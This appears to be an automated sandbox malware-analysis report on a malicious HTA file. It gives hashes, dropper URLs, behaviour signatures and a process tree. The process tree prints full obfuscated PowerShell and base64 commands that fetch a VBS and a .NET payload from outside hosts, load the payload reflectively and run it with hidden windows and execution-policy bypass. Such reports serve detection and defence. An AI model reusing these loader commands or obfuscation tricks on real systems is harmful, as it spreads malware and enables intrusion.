Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 08:16

General

  • Target

    thinkingbestthingswhichcomingetniretimegivenmegood.hta

  • Size

    600KB

  • MD5

    c24178318fab715f3b613fc11396ed80

  • SHA1

    d6711bb536adde5cb961f7d1559fc287f4aa3d76

  • SHA256

    70576f474296d70ab1182339945255eeed65d7f5e8b71b153a56b9e2c0478ec5

  • SHA512

    f397726076afe79c0f2e00afd8ddd7bc90e47cdffd04a033552e9246039cf781bf08c1a1bfb49c056d853106f82d6d00826f7b4cf9752bba032def61bb0e7d71

  • SSDEEP

    192:4dE6COljVxi5Dq4bm4i5Dq4gmXPi5Dq4oi5Dq4Umji5Dq4Jzt4kQ:b6COljV/zO7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

exe.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\thinkingbestthingswhichcomingetniretimegivenmegood.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\SysWOW64\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe
      "C:\Windows\sYStEM32\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe" "poWeRSHell.exE -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT ; Iex($(iex('[sySTem.TExt.enCoDINg]'+[cHAR]58+[CHar]0x3a+'utf8.GetSTrING([SYsTem.CoNVERT]'+[chaR]0X3a+[cHar]0x3a+'FromBASE64StRINg('+[char]34+'JE5yakxDICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlZmluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpveSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVck5XY2FHYVpQLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENvR3FKbU9hdix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0JSVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS0JFbEZIZXQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ4S09Ld2IiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVYVUZJUUF2eCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTnJqTEM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE5Mi8xMjIvd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGluZ3MudElGIiwiJEVudjpBUFBEQVRBXHdlY3JlYXRlZGJldHRlcnRoaW5nc2dvb2R3YXllbnRpcmVsaWZlZ3JlYXR0b2dvYmV0dGVydGhpLnZCcyIsMCwwKTtTdEFSdC1TTGVlcCgzKTtJSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGkudkJzIg=='+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:972
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5tq8lmd.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB904.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB903.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2744
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\wecreatedbetterthingsgoodwayentirelifegreattogobetterthi.vBs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoIChbc1RySU5nXSR2RXJCb3NFcHJFRkVSZW5jZSlbMSwzXSsnWCctam9pbicnKSgoKCdzOTBKaW1hJysnZ2VVcmwgPSBJZkpvaHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGknKycvZmlsZS9nZXQnKyc/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfMHhDeS14bDR0bnhsQVZiUTk1LWQnKyd2aVRLNWNBUmFOZCcrJ1FqYmIzbWV4ZndReksnKydtVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSWYnKydKbztzOTBKd2ViQ2xpZW50ID0nKycgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtzOTBKaW1hZ2VCeXRlcyA9IHM5MEp3ZWJDbGllbnQuRG93bmxvYWREYXRhKHM5MEppbWFnZVVybCk7czkwSmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHM5MEppbWFnZUJ5dGVzKTtzOTBKc3RhcnRGbGFnID0gSWZKbzw8QkFTRTY0X1NUQVJUPj5JZkpvO3M5MEplbmRGbGFnID0gSWZKbzw8QkFTRTY0X0VORD4+SWZKbztzOTBKc3RhcnRJbmRleCA9IHM5MEppbWFnZVRleHQuSW5kZXhPZihzOTBKc3RhcnRGbGFnKTtzOTBKZW5kSW5kZXggPSBzOTBKaW1hZ2VUZXh0LkluZGV4T2YoczkwSmVuZEZsYWcpO3M5MEpzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgczkwSmVuZEluZGV4IC1ndCBzOTBKc3RhcnRJbmRleDtzOTBKc3RhcnRJbmRleCArPSBzOTBKc3RhcnRGbGFnLkxlbmd0aDtzOTBKYmFzZTY0TGVuZ3RoID0gczkwSmVuZEluZGV4IC0gczkwSnN0YXJ0SW5kZXg7czkwSmJhc2U2NENvbW1hbicrJ2QgPSBzOTBKaW1hZ2VUZXh0LlN1JysnYnN0cmluZyhzOTBKc3RhcnRJbmRleCwgczkwSmJhc2U2NExlbmd0aCk7czkwJysnSmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKHM5MEpiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdzRFIEZvckVhY2gtT2JqZWN0IHsgczkwSl8gfSlbLTEuLi0oczkwSmJhc2U2NENvbW1hbmQuTCcrJ2VuZ3RoKV07czkwSmNvbW1hbmRCJysneXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF0nKyc6OkZyb21CYXNlNjRTdHJpbmcoczkwSmJhc2U2NFJldmVyc2VkKTtzOTBKbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHM5MEpjb21tYW5kQnl0ZXMpO3M5MEp2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKElmSm9WQUlJZkpvKScrJztzOTBKdmFpTWV0aG9kLkludm9rZShzOScrJzBKbnVsbCwgQChJZkpvdHh0LlJGVlJFLzIyMS8yOTEuODcxLjY0Ljg5MS8vOnB0dGhJZkpvLCBJZkpvZGVzYXRpdmFkb0lmSm8sIElmSm9kZXNhdGl2YWRvSWZKbywgSWZKJysnb2Rlc2F0aXZhZG9JZkpvJysnLCBJZkpvQ2FzUG9sSWZKJysnbywgSWZKb2Rlc2F0aXZhZG9JZkpvLCBJJysnZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdGl2YWRvSWZKJysnbyxJZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdCcrJ2l2YWRvSScrJ2ZKbyxJZkpvMUlmJysnSm8sSWZKb2Rlc2F0aXZhZG9JZkpvKSk7JykgIC1DcmVQTGFjRSAnSWZKbycsW0NIYVJdMzktUmVQbEFDZSAnczkwSicsW0NIYVJdMzYtQ3JlUExhY0UgIChbQ0hhUl0xMTkrW0NIYVJdNTIrW0NIYVJdNjkpLFtDSGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( ([sTrINg]$vErBosEprEFERence)[1,3]+'X'-join'')((('s90Jima'+'geUrl = IfJohttps://3105.filemail.com/api'+'/file/get'+'?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-d'+'viTK5cARaNd'+'Qjbb3mexfwQzK'+'mTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c If'+'Jo;s90JwebClient ='+' New-Object System.Net.W'+'ebClient;s90JimageBytes = s90JwebClient.DownloadData(s90JimageUrl);s90JimageText = [System.Text.Encoding]::UTF8.GetString(s90JimageBytes);s90JstartFlag = IfJo<<BASE64_START>>IfJo;s90JendFlag = IfJo<<BASE64_END>>IfJo;s90JstartIndex = s90JimageText.IndexOf(s90JstartFlag);s90JendIndex = s90JimageText.IndexOf(s90JendFlag);s90JstartInde'+'x -ge 0 -and s90JendIndex -gt s90JstartIndex;s90JstartIndex += s90JstartFlag.Length;s90Jbase64Length = s90JendIndex - s90JstartIndex;s90Jbase64Comman'+'d = s90JimageText.Su'+'bstring(s90JstartIndex, s90Jbase64Length);s90'+'Jbase64Reversed = -join (s90Jbase64Command.ToCharArray'+'() w4E ForEach-Object { s90J_ })[-1..-(s90Jbase64Command.L'+'ength)];s90JcommandB'+'ytes = [Syste'+'m.Convert]'+'::FromBase64String(s90Jbase64Reversed);s90JloadedAssembly = [System.Reflection.Assembly]::Load(s90JcommandBytes);s90JvaiMethod = [dnlib.IO.Home].GetMethod(IfJoVAIIfJo)'+';s90JvaiMethod.Invoke(s9'+'0Jnull, @(IfJotxt.RFVRE/221/291.871.64.891//:ptthIfJo, IfJodesativadoIfJo, IfJodesativadoIfJo, IfJ'+'odesativadoIfJo'+', IfJoCasPolIfJ'+'o, IfJodesativadoIfJo, I'+'fJodesativadoIfJo,IfJodesativadoIfJo,IfJodesativadoIfJ'+'o,IfJodesativadoIfJo,IfJodesativadoIfJo,IfJodesat'+'ivadoI'+'fJo,IfJo1If'+'Jo,IfJodesativadoIfJo));') -CrePLacE 'IfJo',[CHaR]39-RePlACe 's90J',[CHaR]36-CrePLacE ([CHaR]119+[CHaR]52+[CHaR]69),[CHaR]124))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:744

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESB904.tmp

    Filesize

    1KB

    MD5

    29d809c08ffbe4fd790860aad4a5f3c3

    SHA1

    beaf372069d5ca90a7c8926a4196f4f9501fcaf3

    SHA256

    d8c4c95a818f17e23cc7bac7ec57980f2e1f39154f9e849fe0c20a2c555d69f0

    SHA512

    09e49b682be67a33174dab16693582d78c92c1f65c1ad3571159665256c7287fcd610ea09b3b76a3ea32384e7191c370ac1d4006ac1d572cbdb307182e40e409

  • C:\Users\Admin\AppData\Local\Temp\e5tq8lmd.dll

    Filesize

    3KB

    MD5

    7e1984a3e46b7b4ad708e5778e52e47b

    SHA1

    66d6abf95d4dd1026993bdf9e9984b3e0502d950

    SHA256

    c942beeb24cdbc6582af7e50672c0b474ebd8253cb5e214b86e4cd7ef8931960

    SHA512

    ea3820937fee800fae4941ba7a0b5910c633d4f984289ec368f915c86a27020ec0c78617e3c332467557122eb9676d20ab89e00d46aaed637e22f544607e596c

  • C:\Users\Admin\AppData\Local\Temp\e5tq8lmd.pdb

    Filesize

    7KB

    MD5

    4dc13ceb1c05ad88d35b5f0f6f6f1a72

    SHA1

    8c141bb23996486c02b5dea7112a1b72c9b53e02

    SHA256

    7cc3ed39986dced89ecb098894637582e832d0e9ad8aa8eb57df83abdc3c006f

    SHA512

    7761126c8e6ba4ead174499bc1119527615ba6faf7ed170ae2811669265d805a4a1860e54b440a3b304ba1457168a32ea0b780dde3bd8c7d91bdc049ebd5080e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    3d4330f78b65d98df4abe190cd98c287

    SHA1

    a96a6932ba443971973bb1998e13b45b4d22e348

    SHA256

    2804810480899f6484a180937871ce1dcc359ee0df14a583b579adcea40d3b4b

    SHA512

    11bab971a0871d38992494b1b19c9d5eafe9df8848a87601364677cc6f658569a6df4d3497423743bc8ae971cbcafde2e6aa6dd1b65a36a5fc8785e20f75464c

  • C:\Users\Admin\AppData\Roaming\wecreatedbetterthingsgoodwayentirelifegreattogobetterthi.vBs

    Filesize

    162KB

    MD5

    66dea8976cdda98cc8301cb75c297156

    SHA1

    1c4404c8cc6c6c02df18ea7dc6519e7edad84c49

    SHA256

    ccaf45b19838ab67444ad6df528545ffd72b7d68060b4fcedcfc2a1f7a855e3c

    SHA512

    66235e9912a1cb62d6d6a997d2f8e56ee656fb1aae12499cc54a2773c2edd240c0e5bdec355caa65e035180a26e5f203234de00b61b2681a63c66770d1156a7f

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB903.tmp

    Filesize

    652B

    MD5

    4a74da3bbf8bfcd420aaeefbf13c1580

    SHA1

    ad039e6bcaa1c3cb797d91a17b7e3b374495196e

    SHA256

    0cdfab9baf9b90f404f7f755fbc5c7e5121228ce1f8c7eaaf0b1c4276f2bc5a4

    SHA512

    b5573eb2b70681462a2e4b2d0c91afcb76ad7f6e450f776dccaa2b8470bbe20778e7273e4e77d5c163e25eabc8b8fd3af5b503aff64e3a2f41efd348ec714b32

  • \??\c:\Users\Admin\AppData\Local\Temp\e5tq8lmd.0.cs

    Filesize

    487B

    MD5

    ec9211d8c72f21a987a7352367f9a790

    SHA1

    7c513a66a26f28514e820f65c7b0cc5f47966295

    SHA256

    f16e7c3d9c844d3e5a58436c50ed9562b5c1ba9c7786c04c179514284716b136

    SHA512

    81d9ab17eb0c2a1c96dd48c3a572c5548664e7bfeb07b819b83d50479f23f4c42d1278af6ae185b91ca2aecf4823be20d968e21b354f4de808b43d375be89976

  • \??\c:\Users\Admin\AppData\Local\Temp\e5tq8lmd.cmdline

    Filesize

    309B

    MD5

    e3e21d6969ccfc9e402df820c7141f22

    SHA1

    1459f71fc5d85af7789babfbe5636af9d073f5d3

    SHA256

    afb0b5529c663e77d7c3f664c69106a2c3e41290c9fb9f4e4a4c73c35e02509d

    SHA512

    d1981aded1dcff25ff76a5d3fe52d251d541471afc5de943d0d9872e4ae41d86c599b840ce901d3e043d501368786e4235ce6dcbf026c5c441423ba8802b0422